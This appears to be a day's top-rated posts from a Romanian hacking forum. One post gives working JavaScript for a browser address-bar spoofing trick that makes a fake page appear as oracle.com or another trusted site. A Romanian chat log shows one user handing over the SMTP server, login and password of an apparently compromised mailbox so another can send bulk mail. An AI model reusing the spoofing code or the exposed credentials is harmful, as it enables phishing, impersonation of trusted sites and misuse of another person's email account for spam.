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Showing content with the highest reputation on 06/30/15 in all areas

  1. 1 point
  2. Impact: The "click to verify" thing is completely broken... Anyone can be "BBB Accredited Business" etc. You can make whitehouse.gov display "We love Islamic State" Note: No user interaction on the fake page. Code: ***** index.html <script> function next() { w.location.replace('http://www.oracle.com/index.html?'+n);n++; setTimeout("next();",15); setTimeout("next();",25); } function f() { w=window.open("content.html","_blank","width=500 height=500"); i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5); } </script> <a href="#" onclick="f()">Go</a><br> ***** content.html <b>This web page is NOT oracle.com</b> <script>location="Oracle | Integrated Cloud Applications and Platform Services";</script> ***** It's online Deusen - gwhere (The page says "June/16/2015" - it works as we tested today) Request For Comment: We reported this to Google. They reproduced, and say It's DoS which doesn't matter. We think it's very strange, since the browser does not crash(not DoS), and the threat is obvious. What's your opinion? Kind Regards, PS We love clever tricks. We love this: Dieyu
    1 point
  3. Top 10 articole: S-au n?scut gemenii cu simbolurile Apocalipsei. Vine sfâr?itul lumii în 1260 de zile? Profe?ii necunoscute ale p?rintelui Arsenie Boca despre România, CHEIA LUI SOLOMON, cartea prin care se invoca demonii Seems totally legit.
    1 point
  4. Ba da voi doi sunteti ratati ? @Aerosol.
    -1 points
  5. Conversatia de pe messenger amice nicknam3s: dar daca este sub forma de ip test test nicknam3s: nu este ok ca nu sunt bune deloc worm32.worm32: am si cpanels nicknam3s: Nu imi trebuie frate , eu am 5k newsletter pe saptamana , nu sunt eu hacker nicknam3s: Am un mic site de stiri ce vreau sa imi trimit newsletterul atata tot worm32.worm32: iti dau unu de test sa vezi daca e ok? nicknam3s: da nicknam3s: alea cu test test sunt de rahat trimite 10 si dupa nimic .. nicknam3s: reusesti ? worm32.worm32: da worm32.worm32: stai nicknam3s: merg la kaufland nicknam3s: ca e duminica si la 3-4 inchide nicknam3s: in max 30 min vin poti sa il lasi aici worm32.worm32: ok worm32.worm32: secure155.servconfig.com worm32.worm32: user: inbox@alamountproductions.com pass: magician10 worm32.worm32: port 465 nicknam3s: Acum sunt worm32.worm32: ti-am lasat worm32.worm32: testeaza nicknam3s: eu nu am istoric nicknam3s: imi mai poti da o data te rog nicknam3s: Domain alamountproductions.com has exceeded the max emails per hour (155/150 (103%)) nicknam3s: are limita de 155 de mailuri pe ora nicknam3s: ... nicknam3s: daca ai ceva mai ok imi spui te rog nicknam3s: ms Si dupa ai disparut
    -1 points
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